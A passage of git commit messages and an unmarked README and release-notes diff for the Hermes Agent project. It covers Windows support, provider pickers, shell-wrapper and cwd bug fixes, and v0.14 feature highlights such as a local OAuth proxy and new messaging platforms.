contract guard.
* docs(desktop): rewrite README as a real product readme
Lead with what the app is and how to get it (download an installer, or
`hermes desktop` for existing CLI users) plus a plain-language feature list,
then keep contributor/build/internals as a clearly separated secondary section.
* docs(desktop): fix install framing — releases no longer auto-build installers
Lead with the install-with-Hermes path (`--include-desktop` / `hermes desktop`),
which always works, and describe prebuilt installers as manually published when
a release ships them rather than implying CI attaches them to every release.
* docs(desktop): match base repo README style
Adopt the root README's conventions: centered title + badge row, bold
one-liner intro, a feature <table> grid, --- section dividers, and a
Community / License footer.
* feat(desktop): recover from gateway boot failures + validate API keys on entry (#35864)
Fresh installs that hit a gateway boot failure had no recovery path: the
shell rendered dead ("gateway offline"), logs were undiscoverable, and a
mistyped API key was accepted because onboarding only checked credential
presence, not validity.
- Add BootFailureOverlay: a top-level recovery surface (Retry, Repair
install, Use local gateway, Open logs + inline recent logs) that mounts
on any hard boot failure, including post-install. Trims the now-redundant
recovery button from the onboarding Preparing panel.
- Add hermes:logs:reveal / :recent IPC (reveal desktop.log) and a
hermes:bootstrap:repair IPC that drops the bootstrap marker to force a
clean reinstall. Surface "Open logs" in Gateway settings too.
- Add POST /api/providers/validate: a live per-provider probe
(OpenRouter/OpenAI/xAI/Gemini key check, local endpoint connectivity)
wired into saveOnboardingApiKey so a rejected key blocks before it's
persisted, while an unreachable probe falls through (offline-safe).
* test(model-catalog): fix stale nous picker test after curated-list change
ac2e48907 made the GUI/picker Nous row use the curated list (curated["nous"]
= get_curated_nous_model_ids()) + Portal union, matching the `hermes model`
CLI — but test_picker_nous_row_uses_manifest still asserted the old 2-model
manifest snapshot, breaking the test shard.
Rewrite it as an invariant: stub the Portal union to passthrough and assert the
row equals get_curated_nous_model_ids() computed under the same conditions, so
it tracks the real contract instead of a hardcoded model list that rots on every
catalog update.
---------
Co-authored-by: emozilla <emozilla@nousresearch.com>
Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com>
Co-authored-by: Austin Pickett <pickett.austin@gmail.com>
Co-authored-by: Cursor <cursoragent@cursor.com>
Co-authored-by: ethernet <arilotter@gmail.com>
Co-authored-by: copilot-swe-agent[bot] <198982749+Copilot@users.noreply.github.com>
Native Windows is out of beta. Removes the early-beta warnings, headings,
and rough-edge framing across the README and docs (EN + zh-Hans), keeping
the WSL2-only dashboard PTY caveat. Historical RELEASE_v0.14.0.md notes are
left intact since they accurately describe the state at that release.
- README: Windows install + cross-platform notes
- index.mdx, installation.md: headings, warning admonitions, parity note
- windows-native.md: title/sidebar_label/warning, provider-hunting tip
- contributing.md, nous-portal.md: cross-platform / Portal parity prose
- Repoint cross-links to the renamed installation#windows-native-powershell
anchor (EN) and #windows原生powershell (zh, also fixes pre-existing drift)
For grouped provider families, the descriptive text now lives only on the
collapsed top-level group row. The member sub-picker rows show just the
short provider label (no parenthetical tui_desc), so the description is not
duplicated one layer down.
Ungrouped providers are unaffected — they have no group layer, so their own
row keeps its full tui_desc.
- main.py: member sub-picker uses provider_labels (label) instead of
canonical_descs (tui_desc).
- Telegram already showed labels + model count on member buttons; group
buttons keep Label ▸ (count) since inline keyboards can't fit a long blurb.
Member labels retain their short disambiguators (e.g. 'MiniMax (OAuth)') so
the sub-picker rows stay distinguishable.
The 7 consolidated provider families (OpenAI, xAI Grok, GitHub Copilot,
Google Gemini, Kimi / Moonshot, MiniMax, OpenCode) collapse to one
top-level picker row. Previously that row showed only the bare group
label (e.g. `OpenAI ▸`); now it carries a short blurb describing the
endpoints folded inside (e.g. `OpenAI ▸ (Codex CLI or direct OpenAI API)`).
- models.py: extend PROVIDER_GROUPS tuples to (label, description, members);
group_providers() emits the description on group rows.
- main.py: CLI picker renders `<label> ▸ (<description>)` for group rows.
- telegram.py: update the group tuple unpack (button text keeps the member
count, which fits inline keyboards better than a long blurb).
- tests: assert every group has a non-empty description and the fold emits it.
Member-specific detail still lives in each member's tui_desc and shows in
the drill-down sub-picker. Slug identity, --provider, /model paths unchanged.
Update the tui_desc text shown for each provider in the interactive
`hermes model` / setup wizard / `/model` pickers. Pure copy refresh —
slugs, labels, PROVIDER_GROUPS folding, and all typed paths are unchanged,
so the 7 grouped families (OpenAI, xAI Grok, GitHub Copilot, Google Gemini,
Kimi / Moonshot, MiniMax, OpenCode) still fold identically.
Also aligns the auto-injected alibaba-coding-plan provider description to
the same parenthetical style.
Follow-up to the synthetic-notification DM-topic routing fix. The new
_is_telegram_dm_topic_target probed the adapter's _get_dm_topic_info via
instance-level getattr, which a MagicMock auto-creates as a truthy callable —
so any test double with a non-dm chat_type and a thread_id would be
misclassified as a DM topic lane and have the fallback routing keys injected.
Resolve the method on type(adapter) and treat only dict-shaped returns as an
operator-declared topic, mirroring the existing guard in
_rename_telegram_topic_for_session_title. Update the home-channel startup test
to declare _get_dm_topic_info on a real adapter subclass instead of patching a
MagicMock onto the instance.
Background tasks on non-local backends (SSH/Docker/Modal/Daytona/Singularity)
go through `ProcessRegistry.spawn_via_env`, which builds a hand-crafted,
shell-safe wrapper:
mkdir -p T && ( nohup bash -lc CMD > LOG 2>&1; rc=$?; ... ) & echo $! > PID && cat PID
`BaseEnvironment.execute()` unconditionally ran `_rewrite_compound_background`
on every command, including this wrapper. The rewrite (meant to defuse the
`A && B &` subshell-wait trap for user commands) turns `( ... ) & echo $!` into
`{ ( ... ) & } echo $!` — note `} echo` with no separator, which is a bash
syntax error. The wrapper then never produces a PID, the redirected output file
is never created, and the agent sees an immediate exit code -1. This breaks
*every* background launch on a non-local backend (e.g. a simple
count-and-redirect script over SSH), not just edge cases.
Fix:
- Add `rewrite_compound_background: bool = True` to `BaseEnvironment.execute()`
(and the `BaseModalExecutionEnvironment` override, which accepts and ignores
it). Default preserves existing behavior; the user foreground terminal path
still rewrites.
- `spawn_via_env` passes `rewrite_compound_background=False` so its already
shell-safe wrapper is left intact.
- Treat a wrapper that produces no PID as a failed launch (mark the session
exited with a real exit code instead of exposing a fake running session), and
don't register/checkpoint a session that never started.
Verified empirically: with the rewrite skipped, the wrapper is valid bash,
launches the process, captures the PID, and writes the log/pid/exit files; the
old rewritten form fails `bash -n` with a syntax error.
Based on #33756 by @CharZhou (extracted from a multi-feature branch; the
unrelated image_gen / docker-media changes are not included here).
Co-authored-by: CharZhou <17255546+CharZhou@users.noreply.github.com>
terminal_tool re-sent the init-time/config cwd on every command, clobbering
session-local `cd` state: the environment tracked the new directory in
`env.cwd`, but foreground/background calls forced the old cwd back. A small
`_resolve_command_cwd` resolver now applies the precedence
`workdir > live env.cwd > config/override cwd` to:
- foreground `env.execute(...)`
- background `process_registry.spawn_local(...)`
- background `process_registry.spawn_via_env(...)`
Additionally, syncing the cwd onto the live cached env when a `cwd` override is
(re-)registered. Preferring live `env.cwd` would otherwise demote the ACP
`update_cwd` override (registered via `register_task_env_overrides` on
`session/load` / `session/resume`) below an already-set `env.cwd`, silently
ignoring an editor's mid-session project-root change once any command had run.
`register_task_env_overrides` now pushes a new cwd onto the cached env so an
explicit ACP cwd change wins, while ordinary in-session `cd` tracking is
preserved.
Regression coverage:
- foreground/background commands follow live `env.cwd`
- explicit `workdir` still overrides everything
- registering a cwd override updates the live env cwd (ACP authority)
- no-op when no live env exists; non-cwd overrides leave env.cwd untouched
Based on #35510 by @Dusk1e.
Co-authored-by: Dusk1e <yusufalweshdemir@gmail.com>
2026-05-31 23:50:40 +05:30
781 changed files with 130953 additions and 23508 deletions
> **Heads up:** Native Windows support is **early beta**. It installs and runs, but hasn't been road-tested as broadly as our Linux/macOS/WSL2 paths. Please [file issues](https://github.com/NousResearch/hermes-agent/issues) when you hit rough edges. For the most battle-tested Windows setup today, run the Linux/macOS one-liner above inside **WSL2**.
> **Heads up:** Native Windows runs Hermes without WSL — CLI, gateway, TUI, and tools all work natively. If you'd rather use WSL2, the Linux/macOS one-liner above works there too. Found a bug? Please [file issues](https://github.com/NousResearch/hermes-agent/issues).
The installer handles everything: uv, Python 3.11, Node.js, ripgrep, ffmpeg, **and a portable Git Bash** (MinGit, unpacked to `%LOCALAPPDATA%\hermes\git` — no admin required, completely isolated from any system Git install). Hermes uses this bundled Git Bash to run shell commands.
The installer handles everything: uv, Python 3.11, Node.js, ripgrep, ffmpeg, **and a portable Git Bash** (MinGit, unpacked to `%LOCALAPPDATA%\hermes\git` — no admin required, completely isolated from any system Git install). Hermes uses this bundled Git Bash to run shell commands.
If you already have Git installed, the installer detects it and uses that instead. Otherwise a ~45MB MinGit download is all you need — it won't touch or interfere with any system Git.
If you already have Git installed, the installer detects it and uses that instead. Otherwise a ~45MB MinGit download is all you need — it won't touch or interfere with any system Git.
> **Android / Termux:** The tested manual path is documented in the [Termux guide](https://hermes-agent.nousresearch.com/docs/getting-started/termux). On Termux, Hermes installs a curated `.[termux]` extra because the full `.[all]` extra currently pulls Android-incompatible voice dependencies.
>
> **Windows:** Native Windows is supported as an **early beta** — the PowerShell one-liner above installs everything, but expect rough edges and please file issues when you hit them. If you'd rather use WSL2 (our most battle-tested Windows path), the Linux command works there too. Native Windows install lives under `%LOCALAPPDATA%\hermes`; WSL2 installs under `~/.hermes` as on Linux. The only Hermes feature that currently needs WSL2 specifically is the browser-based dashboard chat pane (it uses a POSIX PTY — classic CLI and gateway both run natively).
> **Windows:** Native Windows is fully supported — the PowerShell one-liner above installs everything. If you'd rather use WSL2, the Linux command works there too. Native Windows install lives under `%LOCALAPPDATA%\hermes`; WSL2 installs under `~/.hermes` as on Linux. The only Hermes feature that currently needs WSL2 specifically is the browser-based dashboard chat pane (it uses a POSIX PTY — classic CLI and gateway both run natively).
After installation:
@@ -104,17 +104,17 @@ You can still bring your own keys per-tool whenever you want — the gateway is
Hermes has two entry points: start the terminal UI with `hermes`, or run the gateway and talk to it from Telegram, Discord, Slack, WhatsApp, Signal, or Email. Once you're in a conversation, many slash commands are shared across both interfaces.
| Action | CLI | Messaging platforms |
|---------|-----|---------------------|
| Start chatting | `hermes` | Run `hermes gateway setup` + `hermes gateway start`, then send the bot a message |
| Start fresh conversation | `/new` or `/reset`| `/new` or `/reset` |
| Change model | `/model [provider:model]` | `/model [provider:model]` |
| Set a personality | `/personality [name]` | `/personality [name]` |
| Retry or undo the last turn | `/retry`, `/undo`| `/retry`, `/undo` |
| Browse skills | `/skills` or `/<skill-name>` | `/<skill-name>` |
| Interrupt current work | `Ctrl+C` or send a new message | `/stop` or send a new message |
| Platform-specific status | `/platforms` | `/status`, `/sethome` |
For the full command lists, see the [CLI guide](https://hermes-agent.nousresearch.com/docs/user-guide/cli) and the [Messaging Gateway guide](https://hermes-agent.nousresearch.com/docs/user-guide/messaging).
@@ -124,23 +124,23 @@ For the full command lists, see the [CLI guide](https://hermes-agent.nousresearc
All documentation lives at **[hermes-agent.nousresearch.com/docs](https://hermes-agent.nousresearch.com/docs/)**:
| Section | What's Covered |
|---------|---------------|
| [Quickstart](https://hermes-agent.nousresearch.com/docs/getting-started/quickstart) | Install → setup → first conversation in 2 minutes |
> The Foundation Release — Hermes installs and runs anywhere, ships with the things you actually want to use, and stops shipping the things you don't. xAI Grok lands as a SuperGrok OAuth provider with grok-4.3 bumped to a 1M context window. A new OpenAI-compatible local proxy turns any OAuth-authed Hermes provider — Claude Pro, ChatGPT Pro, SuperGrok — into an endpoint that Codex / Aider / Cline / Continue can hit. `x_search` lands as a first-class X (Twitter) search tool with OAuth-or-API-key auth. The Microsoft Teams stack is wired end-to-end (Graph auth + webhook listener + pipeline runtime + outbound delivery). A debloating wave makes installs dramatically lighter — heavyweight backends now lazy-install on first use, the `[all]` extras drop everything covered by lazy-deps, and a tiered install falls back when a wheel rejects on your platform. `pip install hermes-agent` works from PyPI. The cold-start wave shaves ~19 seconds off `hermes` launch. Browser CDP calls are 180x faster. Two new messaging platforms (LINE + SimpleX Chat) bring the total to 22. Cross-session 1-hour Claude prompt caching, `/handoff` that actually transfers sessions live, native button UI for `clarify` on Telegram and Discord, Discord channel history backfill, LSP semantic diagnostics on every write, a unified pluggable `video_generate`, a `computer_use` cua-driver backend that finally works with non-Anthropic providers, clickable URLs in any terminal, Zed ACP Registry integration via `uvx`, native Windows beta, 9 new optional skills, OpenRouter Pareto Code router, huggingface/skills as a trusted default tap. 12 P0 + 50 P1 closures.
> The Foundation Release — Hermes Agent installs and runs anywhere now. Native Windows ships in early beta with a full PowerShell installer story, a `pip install hermes-agent` wheel lands on PyPI, lazy-deps reshape what `pip install hermes-agent` actually pulls down, the supply-chain checker scans every install/upgrade for unsafe versions, and a new OpenAI-compatible local proxy lets Codex / Aider / Cline talk to OAuth-only providers (Claude Pro, ChatGPT Pro, SuperGrok). The cold-start wave shaves ~19 seconds off `hermes` launch, browser-tool CDP calls run 180x faster, and `hermes tools` All-Platforms drops from 14s to under 1.5s. Two new messaging platforms (LINE and SimpleX Chat) and a Microsoft Graph foundation (Teams pipeline + webhook adapter) land alongside `/handoff` that finally transfers sessions live, `vision_analyze` passing pixels through to vision-capable models, `x_search` as a first-class tool, LSP semantic diagnostics on every `write_file` / `patch`, a unified pluggable `video_generate`, a `computer_use` cua-driver backend, cross-session 1-hour Claude prompt caching, a per-turn file-mutation verifier, plus 9 new optional skills. 50+ P1 closures, 12 P0 closures.
---
## ✨ Highlights
- **xAI Grok via SuperGrok OAuth — and grok-4.3 jumps to a 1M context window** — If you pay for SuperGrok, you can now use Grok inside Hermes by signing in with your xAI account — no API key, no separate billing. The wire-through also bumps grok-4.3 to a 1M token context window, so you can drop whole codebases or research corpora into a single prompt. Includes proper handling for entitlement errors and an SSH-to-tunnel docs page for when you're SSH'd into a remote box and need to complete the OAuth flow. ([#26534](https://github.com/NousResearch/hermes-agent/pull/26534), [#26664](https://github.com/NousResearch/hermes-agent/pull/26664), [#26644](https://github.com/NousResearch/hermes-agent/pull/26644), [#26592](https://github.com/NousResearch/hermes-agent/pull/26592))
- **Native Windows support (early beta)** — full PowerShell installer, native subprocess/PTY paths, taskkill-based process management, MinGit auto-install, Microsoft Store python stub detection, foreground Ctrl+C preservation, taskkill+ps2 fallback, npm prefix handling, and ~40 follow-up Windows-only fixes across CLI / gateway / TUI / curator / tools. Hermes finally runs natively on `cmd.exe` and PowerShell, no WSL required. ([#21561](https://github.com/NousResearch/hermes-agent/pull/21561), [#22130](https://github.com/NousResearch/hermes-agent/pull/22130), [#22752](https://github.com/NousResearch/hermes-agent/pull/22752), [#26618](https://github.com/NousResearch/hermes-agent/pull/26618), and many more)
- **OpenAI-compatible local proxy for OAuth providers** — Run `hermes proxy` and you get a `http://localhost:port` endpoint that speaks the OpenAI API but is backed by whichever OAuth provider you're signed into — Claude Pro, ChatGPT Pro, SuperGrok. Now any tool that expects an OpenAI-compatible endpoint (Codex CLI, Aider, Cline, Continue, your custom scripts) just works with your existing subscription, no API key required. One subscription, every tool. ([#25969](https://github.com/NousResearch/hermes-agent/pull/25969))
- **`pip install hermes-agent && hermes`** — Hermes Agent is now a real PyPI package. One command, no clone, no git, no shell installer. Wheel includes the Ink TUI bundle and shell launcher. (salvage of [#26350](https://github.com/NousResearch/hermes-agent/pull/26350)) ([#26593](https://github.com/NousResearch/hermes-agent/pull/26593))
- **`x_search` — first-class X (Twitter) search tool** — The agent can now search X directly without installing a skill or wiring up a custom integration. Search the timeline, find threads, surface specific posts — straight from the chat. Auth with either your X OAuth login or an API key, whichever you have. ([#26763](https://github.com/NousResearch/hermes-agent/pull/26763))
- **Cold-start performance wave — ~19s off `hermes` launch** — skills cache, lazy Feishu import, no Nous HTTP at startup, plus PEP-562 lazy adapter imports (QQ, Yuanbao, Teams, Google Chat), deferred `fal_client` / `google-cloud` / `httpx` loads, models.dev disk-cache-first lookup, parallel doctor API checks, eager-skip plugin discovery on built-in subcommands, `hermes tools` All-Platforms drops from 14s to <1.5s, welcome banner skipped on `chat -q`. ([#22138](https://github.com/NousResearch/hermes-agent/pull/22138), [#22120](https://github.com/NousResearch/hermes-agent/pull/22120), [#22681](https://github.com/NousResearch/hermes-agent/pull/22681), [#22790](https://github.com/NousResearch/hermes-agent/pull/22790), [#22808](https://github.com/NousResearch/hermes-agent/pull/22808), [#22831](https://github.com/NousResearch/hermes-agent/pull/22831), [#22859](https://github.com/NousResearch/hermes-agent/pull/22859), [#22904](https://github.com/NousResearch/hermes-agent/pull/22904), [#22766](https://github.com/NousResearch/hermes-agent/pull/22766), [#25341](https://github.com/NousResearch/hermes-agent/pull/25341))
- **Microsoft Teams — end-to-end** — Hermes can now read messages from Teams and post back. The full Microsoft Graph stack lands together: auth + client foundation, a webhook listener that receives Teams events, a pipeline plugin runtime, and outbound delivery. Wire up the bot once, then chat to your agent from any Teams channel, DM, or group. (salvages of #21408–#21411) ([#21922](https://github.com/NousResearch/hermes-agent/pull/21922), [#21969](https://github.com/NousResearch/hermes-agent/pull/21969), [#22007](https://github.com/NousResearch/hermes-agent/pull/22007), [#22024](https://github.com/NousResearch/hermes-agent/pull/22024))
- **180x faster `browser_console` evaluations** — routed through the supervisor's persistent CDP WebSocket instead of spawning a fresh DevTools session per call. Real-world page interactions feel instant. ([#23226](https://github.com/NousResearch/hermes-agent/pull/23226))
- **Debloating wave — lighter installs, less you don't use** — A clean `pip install hermes-agent` used to pull down everything: every messaging adapter SDK, every image-gen SDK, every voice/TTS provider, whether you used them or not. Now those heavy backends (Slack / Matrix / Feishu / DingTalk adapters, hindsight client, codex app-server, Pixverse / Camofox / image-gen SDKs, voice/TTS providers) install automatically the first time you actually use them. The `[all]` extras drop everything covered by lazy-deps, the installer falls back through tiers when a wheel doesn't fit your platform, and a supply-chain advisory checker scans every install for unsafe versions. Faster installs, smaller disk footprint, fewer transitive vulnerabilities. ([#24220](https://github.com/NousResearch/hermes-agent/pull/24220), [#24515](https://github.com/NousResearch/hermes-agent/pull/24515), [#25014](https://github.com/NousResearch/hermes-agent/pull/25014), [#25038](https://github.com/NousResearch/hermes-agent/pull/25038), [#25766](https://github.com/NousResearch/hermes-agent/pull/25766), [#21818](https://github.com/NousResearch/hermes-agent/pull/21818))
- **Supply-chain advisory checker + lazy-deps framework + tiered install fallback** — every `pip install` / `hermes update` scans dependencies against an advisory list, lazy-deps replace heavy import-time loads with first-use installs, and the installer falls back through extras tiers when a wheel rejects on the target platform. ([#24220](https://github.com/NousResearch/hermes-agent/pull/24220))
- **`pip install hermes-agent && hermes`** — Hermes Agent is now a real PyPI package. No more cloning the repo or running shell installers — one pip command and you're running. The wheel ships with the Ink TUI bundle and the shell launcher, so the full experience comes out of the box. (salvage of [#26350](https://github.com/NousResearch/hermes-agent/pull/26350)) ([#26593](https://github.com/NousResearch/hermes-agent/pull/26593), [#26148](https://github.com/NousResearch/hermes-agent/pull/26148))
- **OpenAI-compatible local proxy** — `hermes proxy` exposes any OAuth-authed provider (Claude Pro, ChatGPT Pro, SuperGrok) as an OpenAI-compatible endpoint that Codex / Aider / Cline / VS Code Continue can hit. Your subscription, your tools. ([#25969](https://github.com/NousResearch/hermes-agent/pull/25969))
- **Cross-session 1h Claude prompt cache** — When you use Claude through Anthropic, OpenRouter, or Nous Portal, the prompt prefix (system prompt, skills, memory) now caches for an hour across sessions. Start a `/new` session and the first response comes back faster and cheaper because the cache is still warm from your last session. Background memory review hits the cache too, so it's not paying full price every turn. ([#23828](https://github.com/NousResearch/hermes-agent/pull/23828), [#25434](https://github.com/NousResearch/hermes-agent/pull/25434), [#24778](https://github.com/NousResearch/hermes-agent/pull/24778))
- **Cross-session 1-hour Claude prompt cache** — Anthropic / OpenRouter / Nous Portal now share a 1h prefix cache across sessions for Claude models. Fast resume, fast `/new`, lower cost on repeat work. ([#23828](https://github.com/NousResearch/hermes-agent/pull/23828))
- **180x faster `browser_console` evaluations** — When the agent uses the browser tool to inspect a page or run JavaScript, those calls now share one persistent connection to Chrome instead of spinning up a new DevTools session every time. The difference is huge: things that used to take a couple of seconds per call return in milliseconds. Real-world page interactions feel instant. ([#23226](https://github.com/NousResearch/hermes-agent/pull/23226))
- **Two new messaging platforms — LINE + SimpleX Chat** — LINE Messaging API lands as a first-class platform, SimpleX Chat salvages #2558 onto the modern adapter spec. Hermes is now on 22 platforms. ([#23197](https://github.com/NousResearch/hermes-agent/pull/23197), [#26232](https://github.com/NousResearch/hermes-agent/pull/26232))
- **Cold-start performance wave — ~19 seconds off `hermes` launch** — Running `hermes` used to make you wait through a chunk of import overhead and network calls before you saw a prompt. Now the launch path is mostly deferred: heavy adapters only load when you use them, model catalogs come from disk cache first, doctor checks run in parallel, and `chat -q` skips the welcome banner entirely. The `hermes tools` All-Platforms screen alone dropped from 14 seconds to under 1.5 seconds. ([#22138](https://github.com/NousResearch/hermes-agent/pull/22138), [#22120](https://github.com/NousResearch/hermes-agent/pull/22120), [#22681](https://github.com/NousResearch/hermes-agent/pull/22681), [#22790](https://github.com/NousResearch/hermes-agent/pull/22790), [#22808](https://github.com/NousResearch/hermes-agent/pull/22808), [#22831](https://github.com/NousResearch/hermes-agent/pull/22831), [#22859](https://github.com/NousResearch/hermes-agent/pull/22859), [#22904](https://github.com/NousResearch/hermes-agent/pull/22904), [#22766](https://github.com/NousResearch/hermes-agent/pull/22766), [#25341](https://github.com/NousResearch/hermes-agent/pull/25341))
- **Microsoft Graph foundation — Teams pipeline + webhook adapter** — `msgraph` auth/client foundation, webhook listener platform, Teams pipeline plugin runtime, and Teams outbound delivery via the existing adapter — Hermes can now read and post to Teams. (salvages of #21408–#21411) ([#21922](https://github.com/NousResearch/hermes-agent/pull/21922), [#21969](https://github.com/NousResearch/hermes-agent/pull/21969), [#22007](https://github.com/NousResearch/hermes-agent/pull/22007), [#22024](https://github.com/NousResearch/hermes-agent/pull/22024))
- **Two new messaging platforms — LINE + SimpleX Chat** — LINE is huge in Japan, Korea, and Taiwan, and now Hermes runs natively on the LINE Messaging API. SimpleX Chat is the privacy-focused decentralized messenger with no user IDs — also wired up as a first-class platform. That brings Hermes to 22 messaging platforms total, so wherever you and your team chat, the agent can be there. ([#23197](https://github.com/NousResearch/hermes-agent/pull/23197), [#26232](https://github.com/NousResearch/hermes-agent/pull/26232))
- **`/handoff` actually transfers the session live** — the agent's active session moves to a different model / persona / profile mid-conversation, with messages, tool history, and context preserved. ([#23395](https://github.com/NousResearch/hermes-agent/pull/23395))
- **`/handoff` actually transfers the session live** — Switching models or personalities mid-conversation used to mean losing context or starting over. Now `/handoff` moves your active session — every message, every tool call, every piece of context — to the target model, persona, or profile, live, without dropping anything. Mid-debugging hand off from a fast model to a deep-reasoning one, or pass a session between profiles for different parts of a task. ([#23395](https://github.com/NousResearch/hermes-agent/pull/23395))
- **`x_search` — first-class X (Twitter) search tool** — gated tool with OAuth-or-API-key auth, no skill needed to query the timeline. ([#26763](https://github.com/NousResearch/hermes-agent/pull/26763))
- **Native button UI for `clarify` on Telegram and Discord** — When the agent uses the `clarify` tool to ask you a multiple-choice question, it now shows real platform-native buttons on Telegram and Discord instead of asking you to type back the option number. Tap the button, the agent gets your answer. Especially nice on mobile. ([#24199](https://github.com/NousResearch/hermes-agent/pull/24199), [#25485](https://github.com/NousResearch/hermes-agent/pull/25485))
- **`vision_analyze` returns pixels to vision-capable models** — when the active model can see, `vision_analyze` now hands the image straight through instead of falling back to a text description. ([#22955](https://github.com/NousResearch/hermes-agent/pull/22955))
- **Discord channel history backfill (default on)** — When Hermes joins a Discord channel or thread for the first time, it now reads the recent message history so it knows what's been said before it responds. No more "what are we talking about?" — the agent has the context that's already on screen for everyone else. ([#25984](https://github.com/NousResearch/hermes-agent/pull/25984))
- **LSP semantic diagnostics on every write** — `write_file` and `patch` now run real language-server diagnostics on the post-edit file (delta-only) and surface real errors before they ship downstream. ([#24168](https://github.com/NousResearch/hermes-agent/pull/24168), [#25978](https://github.com/NousResearch/hermes-agent/pull/25978))
- **`vision_analyze` returns pixels to vision-capable models** — When you point the agent at an image with `vision_analyze` and the active model can actually see (GPT-5, Claude, Gemini, Grok-vision), Hermes now passes the raw pixels straight to the model instead of converting them to a text description first. You get the model's actual visual reasoning instead of a degraded text-summary round-trip. ([#22955](https://github.com/NousResearch/hermes-agent/pull/22955))
- **Per-turn file-mutation verifier footer** — after every turn that wrote files, the agent gets a verifier footer summarizing what actually changed on disk — catches silent overwrites and "wrote it but it didn't land" bugs. ([#24498](https://github.com/NousResearch/hermes-agent/pull/24498))
- **Per-turn file-mutation verifier footer** — After every turn that wrote or edited files, the agent now gets a short footer summarizing exactly what changed on disk — the file paths, the line counts, the actual delta. That means the agent catches its own mistakes when a write didn't land or got silently overwritten, instead of confidently telling you "I added the function" when the file wasn't actually saved. ([#24498](https://github.com/NousResearch/hermes-agent/pull/24498))
- **Unified `video_generate` with pluggable provider backends** — single tool, any backend. Drop in a new video provider as a plugin, no core changes. ([#25126](https://github.com/NousResearch/hermes-agent/pull/25126))
- **LSP semantic diagnostics on every write** — When the agent uses `write_file` or `patch`, Hermes now runs a real language server against the edited file and surfaces any new errors back to the agent before the next turn. Type errors, undefined symbols, missing imports — caught immediately. Goes way beyond v0.13.0's basic Python/JSON/YAML/TOML linting because it's actual semantic analysis. ([#24168](https://github.com/NousResearch/hermes-agent/pull/24168), [#25978](https://github.com/NousResearch/hermes-agent/pull/25978))
- **`computer_use` cua-driver backend** — proper focus-safe ops, non-Anthropic provider support, refresh on `hermes update`. Computer-use is no longer locked to a single SDK. (re-salvage of #16936) ([#21967](https://github.com/NousResearch/hermes-agent/pull/21967), [#24063](https://github.com/NousResearch/hermes-agent/pull/24063))
- **Unified `video_generate` with pluggable provider backends** — One tool, any video model. Hermes ships with the obvious backends already, but you can drop in a new video provider as a plugin without touching core. So when a new video model lands next month, it can be a one-file plugin instead of a fork. ([#25126](https://github.com/NousResearch/hermes-agent/pull/25126))
- **xAI Grok OAuth provider — SuperGrok via subscription** — sign in with your xAI account, talk to Grok models from Hermes. ([#26534](https://github.com/NousResearch/hermes-agent/pull/26534))
- **`computer_use` cua-driver backend — works with non-Anthropic models now** — Computer-use (the agent controlling your mouse and keyboard to drive GUI apps) used to be locked to Anthropic's SDK. The new cua-driver backend works with non-Anthropic providers too, has proper focus-safe operations, and refreshes itself on `hermes update`. Now any vision-capable model can drive your desktop. (re-salvage of #16936) ([#21967](https://github.com/NousResearch/hermes-agent/pull/21967), [#24063](https://github.com/NousResearch/hermes-agent/pull/24063))
- **Clarify with buttons — native inline keyboards on Telegram + Discord** — the `clarify` tool renders multi-choice prompts as platform-native buttons instead of typed responses. ([#24199](https://github.com/NousResearch/hermes-agent/pull/24199), [#25485](https://github.com/NousResearch/hermes-agent/pull/25485))
- **Clickable URLs in any terminal** — Links in agent output are now real OSC8 hyperlinks with hover-highlight in any terminal that supports them. Click to open in your browser — no more copy-paste-trim of long URLs from the transcript. Just works in iTerm2, Kitty, Ghostty, modern Windows Terminal, etc. (@OutThisLife) ([#25071](https://github.com/NousResearch/hermes-agent/pull/25071), [#24013](https://github.com/NousResearch/hermes-agent/pull/24013))
- **Discord channel history backfill (default on)** — Hermes reads recent channel history when joining a thread so it actually knows what's been said. ([#25984](https://github.com/NousResearch/hermes-agent/pull/25984))
- **Zed ACP Registry — `uvx` install in one click** — Hermes is now listed in Zed's Agent Client Protocol registry, so Zed users can install it with one click. The install path uses `uvx` so there's no npm dependency. `hermes acp --setup-browser` bootstraps the browser tools for registry-driven installs. (salvage of [#25908](https://github.com/NousResearch/hermes-agent/pull/25908)) ([#26079](https://github.com/NousResearch/hermes-agent/pull/26079), [#26120](https://github.com/NousResearch/hermes-agent/pull/26120), [#26234](https://github.com/NousResearch/hermes-agent/pull/26234))
- **Watchers skill — RSS / HTTP JSON / GitHub polling via cron `no_agent` mode** — skill recipes that wire change-detection sources directly into cron's script-only watchdog mode. ([#21881](https://github.com/NousResearch/hermes-agent/pull/21881))
- **OpenRouter Pareto Code router with `min_coding_score` knob** — OpenRouter's "Pareto" router automatically picks the cheapest model that meets a minimum quality bar. The new `min_coding_score` config lets you set that bar for coding tasks specifically — Hermes routes to the most affordable model that's at least that good at code. Stop paying for top-tier models when a mid-tier one would do. ([#22838](https://github.com/NousResearch/hermes-agent/pull/22838))
- **Zed ACP Registry integration + uvx distribution** — Hermes is in the Zed registry, installable via `uvx` (no npm). Plus `hermes acp --setup-browser` bootstraps browser tools for registry installs. (salvage of [#25908](https://github.com/NousResearch/hermes-agent/pull/25908)) ([#26079](https://github.com/NousResearch/hermes-agent/pull/26079), [#26120](https://github.com/NousResearch/hermes-agent/pull/26120), [#26234](https://github.com/NousResearch/hermes-agent/pull/26234))
- **NovitaAI as a new model provider** — NovitaAI joins the provider lineup, giving you another option for open-source model hosting (Llama, Qwen, DeepSeek, etc.) with their pricing and rate limits. (salvage #7219) (@kshitijk4poor) ([#25507](https://github.com/NousResearch/hermes-agent/pull/25507))
- **OpenRouter Pareto Code router** — wire a new OpenRouter router with `min_coding_score` knob. Pick the cheapest model that meets your quality bar. ([#22838](https://github.com/NousResearch/hermes-agent/pull/22838))
- **Codex app-server runtime for OpenAI/Codex models** — An optional runtime that drives OpenAI's Codex CLI under the hood when you're using OpenAI or Codex paths. You get session reuse, automatic retirement of wedged sessions, and proper OAuth refresh classification — the kind of plumbing that makes long agentic runs not fall over. ([#24182](https://github.com/NousResearch/hermes-agent/pull/24182), [#25769](https://github.com/NousResearch/hermes-agent/pull/25769))
- **Optional codex app-server runtime for OpenAI/Codex models** — drives the OpenAI Codex CLI under the hood for OpenAI/Codex paths, with session reuse, wedge retirement, and OAuth refresh classification. ([#24182](https://github.com/NousResearch/hermes-agent/pull/24182), [#25769](https://github.com/NousResearch/hermes-agent/pull/25769))
